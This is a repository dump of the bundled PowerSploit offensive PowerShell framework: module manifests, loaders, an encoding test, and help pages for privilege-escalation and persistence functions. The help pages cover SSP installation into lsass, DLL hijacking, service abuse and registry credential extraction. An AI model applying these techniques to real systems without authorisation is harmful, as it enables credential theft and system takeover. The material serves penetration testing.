14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
16 |
17 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Mayhem/Mayhem.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Mayhem.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Mayhem Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Mayhem/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Mayhem`
7 |
8 | To see the commands imported, type `Get-Command -Module Mayhem`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed so that they can be run individually. Packaging them in a module simply makes them more portable.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Persistence/Persistence.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Persistence.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Persistence Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Persistence/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Persistence folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Persistence`
7 |
8 | To see the commands imported, type `Get-Command -Module Persistence`
9 |
10 | For help on each individual command, Get-Help is your friend.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/PowerSploit.psm1:
--------------------------------------------------------------------------------
# Root module loader: every sub-directory next to this file, except Tests and docs,
# is imported as its own module. -DisableNameChecking suppresses the warning
# PowerShell emits for functions whose verb is not on the approved list.
# Anything dropped into this directory is loaded on import, so the install
# location should stay writable by trusted users only.
Get-ChildItem -Path $PSScriptRoot |
    Where-Object { $_.PSIsContainer -and ('Tests', 'docs' -notcontains $_.Name) } |
    ForEach-Object { Import-Module -Name $_.FullName -DisableNameChecking }
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/PowerSploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.23107.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU
15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU
16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Privesc/Privesc.psd1:
--------------------------------------------------------------------------------
# PowerShell module manifest for the PowerSploit Privesc (PowerUp) module.
# Comments only were added here; every key/value pair is the shipped manifest.
@{

# Script module or binary module file associated with this manifest.
# (ModuleToProcess is the pre-PowerShell-3.0 spelling of RootModule.)
ModuleToProcess = 'Privesc.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'

# Author of this module
Author = 'Will Schroeder (@harmj0y)'

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Privesc Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# Explicit export list: only the names below leave the module scope; any other
# function defined by the packaged scripts stays private. Keep this in sync with
# the .ps1 files in FileList when functions are added or renamed.
FunctionsToExport = @(
    'Get-ModifiablePath',
    'Get-ProcessTokenGroup',
    'Get-ProcessTokenPrivilege',
    'Enable-Privilege',
    'Add-ServiceDacl',
    'Set-ServiceBinaryPath',
    'Test-ServiceDaclPermission',
    'Get-UnquotedService',
    'Get-ModifiableServiceFile',
    'Get-ModifiableService',
    'Get-ServiceDetail',
    'Invoke-ServiceAbuse',
    'Write-ServiceBinary',
    'Install-ServiceBinary',
    'Restore-ServiceBinary',
    'Find-ProcessDLLHijack',
    'Find-PathDLLHijack',
    'Write-HijackDll',
    'Get-RegistryAlwaysInstallElevated',
    'Get-RegistryAutoLogon',
    'Get-ModifiableRegistryAutoRun',
    'Get-ModifiableScheduledTaskFile',
    'Get-UnattendedInstallFile',
    'Get-WebConfig',
    'Get-ApplicationHost',
    'Get-SiteListPassword',
    'Get-CachedGPPPassword',
    'Write-UserAddMSI',
    'Invoke-EventVwrBypass',
    'Invoke-PrivescAudit',
    'Get-System'
)

# List of all files packaged with this module
# (The exported functions are presumably defined across PowerUp.ps1 and
# Get-System.ps1 -- confirm against those files.)
FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'

}
63 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Privesc/Privesc.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this file so the functions they define land in the
# module scope. Every script found in the directory is executed at import time.
foreach ($ScriptFile in (Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1'))) {
    . $ScriptFile.FullName
}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/data/PowerSploit/Recon/Dictionaries/generic.txt
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Recon/Recon.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this file so the functions they define land in the
# module scope. Every script found in the directory is executed at import time.
foreach ($ScriptFile in (Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1'))) {
    . $ScriptFile.FullName
}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/ScriptModification/ScriptModification.psd1:
--------------------------------------------------------------------------------
# PowerShell module manifest for the PowerSploit ScriptModification module.
# Comments only were added here; every key/value pair is the shipped manifest.
@{

# Script module or binary module file associated with this manifest.
# (ModuleToProcess is the pre-PowerShell-3.0 spelling of RootModule.)
ModuleToProcess = 'ScriptModification.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Script Preparation/Modification Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# NOTE(review): '*' exports every function the module scripts define, helpers
# included, and forces PowerShell to analyse/load the module to learn its command
# names. An explicit list of the four public functions is the recommended form.
FunctionsToExport = '*'

# List of all files packaged with this module
FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
           'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md'

}
32 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this file so the functions they define land in the
# module scope. Every script found in the directory is executed at import time.
foreach ($ScriptFile in (Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1'))) {
    . $ScriptFile.FullName
}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/ScriptModification/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module ScriptModification`
7 |
8 | To see the commands imported, type `Get-Command -Module ScriptModification`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Tests/PowerSploit.tests.ps1:
--------------------------------------------------------------------------------
# Fail fast on uninitialised variables and references to missing properties.
Set-StrictMode -Version Latest

# Directory holding this test script, and the module root one level above it.
$TestScriptRoot = Split-Path -Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path -Path "$TestScriptRoot\.."
5 |
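filter Assert-NotLittleEndianUnicode {
<#
.SYNOPSIS
Throws if a script file begins with a byte-order mark instead of plain ASCII.

.DESCRIPTION
Accepts file paths (or FileInfo objects via the FullName alias) on the pipeline,
reads the first bytes of each file and interprets the first two as a little-endian
UInt16. That value is compared against the UTF-16 LE BOM (FF FE -> 0xFEFF) and the
first two bytes of the UTF-8 BOM (EF BB BF -> 0xBBEF); either match throws, which is
what the Pester test relies on. Directories, missing files and files shorter than
two bytes are skipped silently (with a debug message).

The original check compared only against 0xBBEF -- the UTF-8 BOM -- while naming it
"little-endian unicode", so a genuinely UTF-16 LE encoded script (the case in the
test's title) was never caught. Both markers are now checked and named correctly.

.PARAMETER FilePath
One or more file paths to check. FileInfo objects bind by property name (FullName).
#>
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $True,
                   ValueFromPipelineByPropertyName = $True,
                   ValueFromPipeline = $True)]
        [Alias('FullName')]
        [String[]]
        $FilePath
    )

    # UTF-16 LE BOM bytes FF FE read as a little-endian UInt16.
    $Utf16LEMarker = 65279 # 0xFEFF
    # First two bytes of the UTF-8 BOM (EF BB BF) read as a little-endian UInt16.
    $Utf8BomMarker = 48111 # 0xBBEF

    Write-Verbose "Current file: $FilePath"
    Write-Debug "Current file: $FilePath"

    if ([System.IO.Directory]::Exists($FilePath)) {
        Write-Debug "File is a directory."
        return
    }

    if (-not [System.IO.File]::Exists($FilePath)) {
        Write-Debug "File does not exist."
        return
    }

    # @() so a one-byte file (which yields a scalar, not an array) still has a
    # .Length under Set-StrictMode instead of erroring.
    $FileBytes = @(Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath)

    # Two bytes are enough to read the marker; the old `-le 2` also skipped
    # exactly-two-byte files, contradicting the message below.
    if ($FileBytes.Length -lt 2) {
        Write-Debug "File must be at least 2 bytes in length."
        return
    }

    $Marker = [BitConverter]::ToUInt16($FileBytes, 0)

    if ($Marker -eq $Utf16LEMarker) {
        Write-Debug "File contains little endian unicode marker."
        # $FilePath, not $_: $_ is the raw pipeline object (a FileInfo when fed
        # from Get-ChildItem), which does not reliably stringify to the path.
        throw "$FilePath is little-endian unicode (UTF-16 LE) encoded."
    }

    if ($Marker -eq $Utf8BomMarker) {
        Write-Debug "File contains UTF-8 byte-order mark."
        throw "$FilePath is UTF-8 encoded with a byte-order mark."
    }
}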
44 |
# Every .ps1/.psd1/.psm1 under the module root is piped through
# Assert-NotLittleEndianUnicode, which throws on the first file whose leading
# bytes match the marker it checks; a throw fails the test. (-Include only
# applies here because -Recurse is also given.) $ModuleRoot is set at the top
# of this file.
Describe 'ASCII encoding of all scripts' {
    It 'should not contain little-endian unicode encoded scripts or modules' {
        { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw
    }
}
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Persistence/Get-SecurityPackage.md:
--------------------------------------------------------------------------------
1 | # Get-SecurityPackage
2 |
3 | ## SYNOPSIS
4 | Enumerates all loaded security packages (SSPs).
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-SecurityPackage
15 | ```
16 |
17 | ## DESCRIPTION
18 | Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
19 | It also parses the returned SecPkgInfo struct array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-SecurityPackage
26 | ```
27 |
28 | ## PARAMETERS
29 |
30 | ## INPUTS
31 |
32 | ## OUTPUTS
33 |
34 | ## NOTES
35 |
36 | ## RELATED LINKS
37 |
38 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Persistence/Install-SSP.md:
--------------------------------------------------------------------------------
1 | # Install-SSP
2 |
3 | ## SYNOPSIS
4 | Installs a security support provider (SSP) dll.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Install-SSP [[-Path] ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Install-SSP installs an SSP dll.
19 | Installation involves copying the dll to
20 | %windir%\System32 and adding the name of the dll to
21 | HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Install-SSP -Path .\mimilib.dll
28 | ```
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
33 | Path to the SSP dll to install. The file is copied to %windir%\System32 and its name is added to the HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages value (see DESCRIPTION and NOTES for the architecture and export requirements).
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases:
39 |
40 | Required: False
41 | Position: 1
42 | Default value: None
43 | Accept pipeline input: False
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ## NOTES
52 | The SSP dll must match the OS architecture.
53 | i.e.
54 | You must have a 64-bit SSP dll
55 | if you are running a 64-bit OS.
56 | In order for the SSP dll to be loaded properly
57 | into lsass, the dll must export SpLsaModeInitialize.
58 |
59 | ## RELATED LINKS
60 |
61 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Add-ServiceDacl.md:
--------------------------------------------------------------------------------
1 | # Add-ServiceDacl
2 |
3 | ## SYNOPSIS
4 | Adds a Dacl field to a service object returned by Get-Service.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Add-ServiceDacl [-Name]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
18 | Dacl field to each object.
19 | It does this by opening a handle to the service with ReadControl access using the
20 | GetServiceHandle Win32 API call, then calling QueryServiceObjectSecurity to retrieve
21 | a copy of the service's security descriptor.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-Service | Add-ServiceDacl
28 | ```
29 |
30 | Add Dacls for every service the current user can read.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service -Name VMTools | Add-ServiceDacl
35 | ```
36 |
37 | Add the Dacl to the VMTools service object.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to add a service Dacl for.
43 | Passable on the pipeline.
44 |
45 | ```yaml
46 | Type: String[]
47 | Parameter Sets: (All)
48 | Aliases: ServiceName
49 |
50 | Required: True
51 | Position: 1
52 | Default value: None
53 | Accept pipeline input: True (ByPropertyName, ByValue)
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ## INPUTS
58 |
59 | ## OUTPUTS
60 |
61 | ### ServiceProcess.ServiceController
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 | [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)
68 |
69 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Find-PathDLLHijack.md:
--------------------------------------------------------------------------------
1 | # Find-PathDLLHijack
2 |
3 | ## SYNOPSIS
4 | Finds all directories in the system %PATH% that are modifiable by the current user.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Find-PathDLLHijack
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates the directories stored in Env:Path (%PATH%) and filters each through Get-ModifiablePath
18 | to return the folders the current user can write to.
19 | On Windows 7, if wlbsctrl.dll is
20 | written to one of these folders, the IKEEXT service loads it because of DLL search-order
21 | loading, hijacking the service's execution.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Find-PathDLLHijack
28 | ```
29 |
30 | Finds all %PATH% .DLL hijacking opportunities.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.HijackableDLL.Path
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableRegistryAutoRun.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableRegistryAutoRun
2 |
3 | ## SYNOPSIS
4 | Returns any elevated system autoruns in which the current user can
5 | modify part of the path string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableRegistryAutoRun
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates a number of autorun specifications in HKLM and filters any
19 | autoruns through Get-ModifiablePath, returning any file/config locations
20 | in the found path strings that the current user can modify.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-ModifiableRegistryAutoRun
27 | ```
28 |
29 | Return vulnerable autorun binaries (or associated configs).
30 |
31 | ## PARAMETERS
32 |
33 | ## INPUTS
34 |
35 | ## OUTPUTS
36 |
37 | ### PowerUp.ModifiableRegistryAutoRun
38 |
39 | Custom PSObject containing results.
40 |
41 | ## NOTES
42 |
43 | ## RELATED LINKS
44 |
45 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableScheduledTaskFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableScheduledTaskFile
2 |
3 | ## SYNOPSIS
4 | Returns scheduled tasks where the current user can modify any file
5 | in the associated task action string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableScheduledTaskFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
19 | and parses the XML specification for each task, extracting the command (action) strings.
20 | Each action string is filtered through Get-ModifiablePath, returning any file/config
21 | locations in the found path strings that the current user can modify.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ModifiableScheduledTaskFile
28 | ```
29 |
30 | Return scheduled tasks with modifiable command strings.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.ModifiableScheduledTaskFile
39 |
40 | Custom PSObject containing results.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableService.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableService
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns services for which the current user can modify the binPath.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableService
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
18 | the current user has rights to change the service configuration.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-ModifiableService
25 | ```
26 |
27 | Get a set of potentially exploitable services.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.ModifiablePath
36 |
37 | ## NOTES
38 |
39 | ## RELATED LINKS
40 |
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableServiceFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableServiceFile
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns vulnerable service files.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableServiceFile
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services by querying the WMI win32_service class.
18 | For each service,
19 | it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
20 | if the current user has rights to modify the service binary itself or any associated
21 | arguments.
22 | If the associated binary (or any configuration files) can be overwritten,
23 | privileges may be able to be escalated.
24 |
25 | ## EXAMPLES
26 |
27 | ### -------------------------- EXAMPLE 1 --------------------------
28 | ```
29 | Get-ModifiableServiceFile
30 | ```
31 |
32 | Get a set of potentially exploitable service binaries/config files.
33 |
34 | ## PARAMETERS
35 |
36 | ## INPUTS
37 |
38 | ## OUTPUTS
39 |
40 | ### PowerUp.ModifiablePath
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-RegistryAlwaysInstallElevated.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAlwaysInstallElevated
2 |
3 | ## SYNOPSIS
4 | Checks if any of the AlwaysInstallElevated registry keys are set.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAlwaysInstallElevated
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
18 | or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
19 | are set, $False otherwise.
20 | Windows Installer honors the policy only when both the HKLM and HKCU values are set; when they are, any .MSI the user installs runs with elevated permissions regardless of the user's own rights.
21 | Because this check returns $True when either value is set, treat a $True result as a lead to confirm (for example with Write-UserAddMSI) rather than as proof of elevation.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-RegistryAlwaysInstallElevated
28 | ```
29 |
30 | Returns $True if any of the AlwaysInstallElevated registry keys are set.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### System.Boolean
39 |
40 | $True if RegistryAlwaysInstallElevated is set, $False otherwise.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-RegistryAutoLogon.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAutoLogon
2 |
3 | ## SYNOPSIS
4 | Finds any autologon credentials left in the registry.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAutoLogon
14 | ```
15 |
16 | ## DESCRIPTION
17 | Checks if any autologon accounts/credentials are set in a number of registry locations.
18 | If they are, the credentials are extracted and returned as a custom PSObject.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-RegistryAutoLogon
25 | ```
26 |
27 | Finds any autologon credentials left in the registry.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.RegistryAutoLogon
36 |
37 | Custom PSObject containing autologin credentials found in the registry.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb)
44 |
45 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ServiceDetail.md:
--------------------------------------------------------------------------------
1 | # Get-ServiceDetail
2 |
3 | ## SYNOPSIS
4 | Returns detailed information about a specified service by querying the
5 | WMI win32_service class for the specified service name.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ServiceDetail [-Name]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Takes an array of one or more service Names or ServiceProcess.ServiceController objects on
19 | the pipeline object returned by Get-Service, extracts out the service name, queries the
20 | WMI win32_service class for the specified service for details like binPath, and outputs
21 | everything.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ServiceDetail -Name VulnSVC
28 | ```
29 |
30 | Gets detailed information about the 'VulnSVC' service.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service VulnSVC | Get-ServiceDetail
35 | ```
36 |
37 | Gets detailed information about the 'VulnSVC' service.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to query information for.
43 |
44 | ```yaml
45 | Type: String[]
46 | Parameter Sets: (All)
47 | Aliases: ServiceName
48 |
49 | Required: True
50 | Position: 1
51 | Default value: None
52 | Accept pipeline input: True (ByPropertyName, ByValue)
